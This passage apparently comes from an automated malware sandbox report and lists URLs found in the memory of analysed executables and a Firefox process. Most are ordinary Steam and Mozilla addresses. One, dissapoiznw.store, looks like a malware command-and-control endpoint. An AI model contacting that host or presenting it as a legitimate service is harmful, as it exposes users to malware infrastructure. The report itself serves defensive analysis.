Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2250494766.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921571137.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921571137.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&amp;
Source: file.exe, 00000000.00000003.2167545129.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2250494766.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921571137.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: firefox.exe, 00000019.00000003.2975681250.000001379E91D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2977256992.000001379E98A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: file.exe, 00000000.00000003.2147753615.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3157667654.000001804BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2147753615.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3157667654.000001804BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3236681244.00000137A10D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3193146359.000001379C9C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3197648410.000001379E1BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3196543245.000001379E02A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3257901918.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dissapoiznw.store:443/apiC&
Source: firefox.exe, 00000019.00000003.2975681250.000001379E91D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3220295992.00000137A0106000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A699D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3271556524.000008FE0D704000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A699D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3272212732.00000BD3C8A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3215694753.000001379FCAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3272021250.00000A97B4D04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.2108201890.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108149493.00000000059D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108287783.00000000059D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2108201890.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108149493.00000000059D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108287783.00000000059D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2108201890.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108149493.00000000059D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108287783.00000000059D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3028904621.00000137A8F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3026895812.00000137A8F35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabRemove
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3047116966.00000137A62C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3248631421.00000137A62C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moresetupPrefs/hideDescriptionsRegions
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsEnable
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3201609300.000001379E203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: file.exe, 00000000.00000003.2147753615.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3157667654.000001804BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
